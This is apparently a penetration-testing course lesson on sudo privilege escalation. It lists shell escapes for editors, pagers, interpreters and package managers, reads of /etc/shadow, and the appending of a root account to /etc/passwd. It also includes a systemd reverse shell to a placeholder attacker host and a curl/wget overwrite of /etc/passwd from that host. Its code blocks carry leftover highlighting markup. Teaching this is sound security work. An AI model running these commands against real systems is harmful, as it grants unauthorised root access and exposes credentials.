Sudo Exploitation Techniques

intermediate35 minWriteup

Exploiting various sudo configurations

Learning Objectives

  • Exploit sudo with GTFOBins
  • Bypass sudo restrictions
  • Exploit NOPASSWD entries
  • Chain sudo with other vulns

You've found

- now let's exploit them. This lesson covers comprehensive exploitation techniques for various sudo configurations, from simple shell escapes to advanced bypass methods.

Each binary that sudo allows has potential escape vectors. Some are obvious (vim → :!bash), others are creative (apache2 → config include). GTFOBins is your reference, but understanding WHY these work helps you find new ones.

Categories of Exploitation

Sudo exploitation falls into categories: shell escapes, file read/write, command execution, and environment abuse. Know which category each binary falls into.

Shell Escape Binaries

Text Editors

bash
1606070;"># vim / vi
2sudo vim -c 606070;">#a5d6ff;">':!/bin/bash'
3sudo vim
4:!bash
5:set shell=/bin/bash
6:shell
7 
8606070;"># nano
9sudo nano
10Ctrl+R → Ctrl+X → Reset, command to execute
11 
12606070;"># emacs
13sudo emacs -Q -nw --eval 606070;">#a5d6ff;">'(term "/bin/bash")'
14606070;"># Or inside emacs: M-x shell
15 
16606070;"># ed
17sudo ed
18!bash
19 
20606070;"># pico
21606070;"># Similar to nano
22sudo pico
23606070;"># Ctrl+T to execute commands

Pagers

bash
1606070;"># less
2sudo less /etc/passwd
3!bash
4606070;"># Or: !/bin/bash
5 
6606070;"># more
7sudo more /etc/passwd
8!/bin/bash
9606070;"># Note: Must be on small terminal or large file to get prompt
10 
11606070;"># most
12sudo most /etc/passwd
13!bash
14 
15606070;"># view (vim in read-only mode)
16sudo view /etc/passwd
17:!/bin/bash

System Utilities

bash
1606070;"># find
2sudo find . -exec /bin/bash \;
3sudo find / -name anything -exec /bin/bash \;
4 
5606070;"># man
6sudo man man
7!/bin/bash
8606070;"># Or set: export PAGER=/bin/bash
9 
10606070;"># watch
11sudo watch -x bash -c 606070;">#a5d6ff;">'bash -i'
12 
13606070;"># time
14sudo time /bin/bash
15 
16606070;"># nice
17sudo nice /bin/bash
18 
19606070;"># env
20sudo env /bin/bash
21 
22606070;"># timeout
23sudo timeout --foreground 10 /bin/bash
24 
25606070;"># strace
26sudo strace -o /dev/null /bin/bash
27 
28606070;"># ltrace
29sudo ltrace -L /bin/bash

-p Flag for Shells

When spawning bash from sudo context, use bash -p if you get a non-root shell. The -p preserves effective UID. Usually not needed with sudo but good habit.

Language Interpreters

bash
1606070;"># Python
2sudo python -c 606070;">#a5d6ff;">'import pty; pty.spawn("/bin/bash")'
3sudo python -c 606070;">#a5d6ff;">'import os; os.system("/bin/bash")'
4 
5606070;"># Python3
6sudo python3 -c 606070;">#a5d6ff;">'import os; os.system("/bin/bash")'
7 
8606070;"># Perl
9sudo perl -e 606070;">#a5d6ff;">'exec "/bin/bash";'
10 
11606070;"># Ruby
12sudo ruby -e 606070;">#a5d6ff;">'exec "/bin/bash"'
13 
14606070;"># Lua
15sudo lua -e 606070;">#a5d6ff;">'os.execute("/bin/bash")'
16 
17606070;"># PHP
18sudo php -r 606070;">#a5d6ff;">'system("/bin/bash");'
19 
20606070;"># Node.js
21sudo node -e 606070;">#a5d6ff;">'require("child_process").spawn("/bin/bash", {stdio: [0, 1, 2]})'
22 
23606070;"># awk
24sudo awk 606070;">#a5d6ff;">'BEGIN {system("/bin/bash")}'
25 
26606070;"># sed (with -e)
27sudo sed -n 606070;">#a5d6ff;">'1e exec bash 1>&0' /etc/passwd

File Read/Write Binaries

Reading Sensitive Files

bash
1606070;"># cat / head / tail / tac
2sudo cat /etc/shadow
3sudo head /etc/shadow
4sudo tail /etc/shadow
5sudo tac /etc/shadow
6 
7606070;"># grep
8sudo grep -r . /etc/shadow
9 
10606070;"># base64
11sudo base64 /etc/shadow | base64 -d
12 
13606070;"># xxd
14sudo xxd /etc/shadow | xxd -r
15 
16606070;"># dd
17sudo dd if=/etc/shadow
18 
19606070;"># diff
20sudo diff /etc/shadow /dev/null
21sudo diff --line-format=%L /dev/null /etc/shadow

Writing Files (Overwrite passwd)

bash
1606070;"># Generate password hash
2openssl passwd -1 -salt xyz password123
3606070;"># Output: $1$xyz$hashvalue
4 
5606070;"># Create new passwd entry
6606070;"># Format: user:hash:0:0:root:/root:/bin/bash
7hacker:$1$xyz$hashvalue:0:0:root:/root:/bin/bash
8 
9606070;"># Using tee
10echo 606070;">#a5d6ff;">'hacker:$1$xyz$hash:0:0:root:/root:/bin/bash' | sudo tee -a /etc/passwd
11 
12606070;"># Using cp
13cp /etc/passwd /tmp/passwd
14echo 606070;">#a5d6ff;">'hacker:$1$xyz$hash:0:0:root:/root:/bin/bash' >> /tmp/passwd
15sudo cp /tmp/passwd /etc/passwd
16 
17606070;"># Using dd
18echo 606070;">#a5d6ff;">'hacker:$1$xyz$hash:0:0:root:/root:/bin/bash' | sudo dd of=/etc/passwd oflag=append
19 
20606070;"># Now: su hacker (password: password123) → root!

Network Tool Exploitation

bash
1606070;"># nmap (old versions)
2sudo nmap --interactive
3!bash
4606070;"># Or: sudo nmap --script=<(echo 'os.execute("/bin/bash")')
5 
6606070;"># tcpdump
7606070;"># Write to file with post-rotation command
8echo '606070;">#!/bin/bash
9bash -i' > /tmp/shell.sh
10chmod +x /tmp/shell.sh
11sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /tmp/shell.sh
12 
13606070;"># wget
14606070;"># Download to overwrite files
15sudo wget http:606070;">//attacker/evil_passwd -O /etc/passwd
16 
17606070;"># curl
18606070;"># Similar to wget
19sudo curl http:606070;">//attacker/evil_passwd -o /etc/passwd
20 
21606070;"># ftp
22sudo ftp
23!/bin/bash
24 
25606070;"># ssh
26sudo ssh -o ProxyCommand=606070;">#a5d6ff;">';bash 0<&2 1>&2' x
27 
28606070;"># socat
29sudo socat stdin exec:/bin/bash

Package Manager Exploitation

bash
1606070;"># apt / apt-get
2sudo apt update -o APT::Update::Pre-Invoke::=606070;">#a5d6ff;">"/bin/bash"
3606070;"># Or create package with postinst script
4 
5606070;"># dpkg
6606070;"># Install malicious package with postinst
7 
8606070;"># yum
9sudo yum localinstall /path/to/malicious.rpm
10 
11606070;"># pip
12606070;"># Malicious package with setup.py running code
13TF=$(mktemp -d)
14echo 606070;">#a5d6ff;">"import os; os.system('/bin/bash')" > $TF/setup.py
15sudo pip install $TF
16 
17606070;"># gem
18TF=$(mktemp -d)
19echo 606070;">#a5d6ff;">'system("/bin/bash")' > $TF/x.rb
20sudo gem build $TF/x.rb
21sudo gem install x.gem

Service-Related Binaries

bash
1606070;"># systemctl
2606070;"># Create malicious service
3TF=$(mktemp).service
4echo '[Service]
5Type=oneshot
6ExecStart=/bin/bash -c 606070;">#a5d6ff;">"bash -i >& /dev/tcp/ATTACKER/PORT 0>&1"
7[Install]
8WantedBy=multi-user.target' > $TF
9sudo systemctl link $TF
10sudo systemctl enable --now $TF
11 
12606070;"># service
13606070;"># If controlling init scripts
14sudo service ../../../tmp/evil_service start
15 
16606070;"># apache2 / nginx
17606070;"># Include malicious config
18606070;"># apache: Include /tmp/evil.conf
19606070;"># Contains: LoadModule shell_exec...
20 
21606070;"># mysql
22sudo mysql -e 606070;">#a5d6ff;">'\! /bin/bash'
23 
24606070;"># psql
25sudo psql
26\! /bin/bash
27 
28606070;"># sqlite3
29sudo sqlite3 /dev/null 606070;">#a5d6ff;">'.shell /bin/bash'

Compression Tools

bash
1606070;"># tar
2sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
3 
4606070;"># zip
5TF=$(mktemp -u)
6sudo zip $TF /etc/hosts -T -TT 606070;">#a5d6ff;">'bash #'
7 
8606070;"># gzip / gunzip
9606070;"># Use to read files
10sudo gzip -f /etc/shadow -t
11606070;"># Or decompress to readable location
12 
13606070;"># 7z
14sudo 7z a -ttar -an -so /dev/null /etc/shadow | xxd

Wildcard Abuse

bash
1606070;"># If sudo allows wildcards in paths:
2606070;"># (root) /usr/bin/cat /var/log/*
3 
4606070;"># Path traversal
5sudo /usr/bin/cat /var/log/../../../etc/shadow
6 
7606070;"># (root) /usr/bin/tar -cf /backup/* /home/*
8606070;"># Create files that become arguments
9cd /home
10touch -- 606070;">#a5d6ff;">'--checkpoint=1'
11touch -- 606070;">#a5d6ff;">'--checkpoint-action=exec=bash'
12606070;"># Now when tar runs with *, these become arguments!
13 
14606070;"># Same works for rsync, find with -exec, etc.

Wildcard Injection

When sudo paths contain wildcards (*), check if you can create files that become malicious arguments. This is especially powerful with tar, rsync, and find.

Environment Variable Exploitation

bash
1606070;"># If sudo preserves environment (env_keep or SETENV):
2606070;"># Check sudo -l for env_keep or SETENV
3 
4606070;"># LD_PRELOAD (usually blocked but check)
5echo '606070;">#include <stdio.h>
6606070;">#include <stdlib.h>
7static void pwn() __attribute__((constructor));
8void pwn() { setuid(0); system(606070;">#a5d6ff;">"/bin/bash -p"); }' > /tmp/pwn.c
9gcc -fPIC -shared -o /tmp/pwn.so /tmp/pwn.c
10sudo LD_PRELOAD=/tmp/pwn.so any_allowed_command
11 
12606070;"># PERL5OPT
13sudo PERL5OPT=-d PERL5DB=606070;">#a5d6ff;">'exec "/bin/bash"' /usr/bin/perl_script
14 
15606070;"># PYTHONPATH
16606070;"># If allowed, inject malicious module

Sudo Exploitation Methodology

Advanced Sudo Attack Flow

1
ParseUnderstand exact sudo -l output
2
GTFOBinsCheck each binary for known escapes
3
CategoryIdentify: shell escape, file r/w, command exec
4
WildcardsCheck for path traversal or argument injection
5
EnvironmentCheck for env_keep or SETENV
6
ChainCombine techniques if single doesn't work

Knowledge Check

Quick Quiz
Question 1 of 3

How can you exploit sudo access to the 'tar' command?

Challenges

Creative Sudo Escape

Challenge
🔥 intermediate

Given sudo access to run 'find' as root, exploit it to gain a root shell without using the standard -exec technique.

Need a hint? (4 available)

Key Takeaways

  • Most binaries have shell escape vectors - check GTFOBins
  • Pagers (less, more) allow !command for shell access
  • Editors (vim, nano) have built-in shell execution
  • Wildcards in sudo paths enable argument injection
  • tar --checkpoint-action is a common exploitation vector
  • Even read-only binaries can read /etc/shadow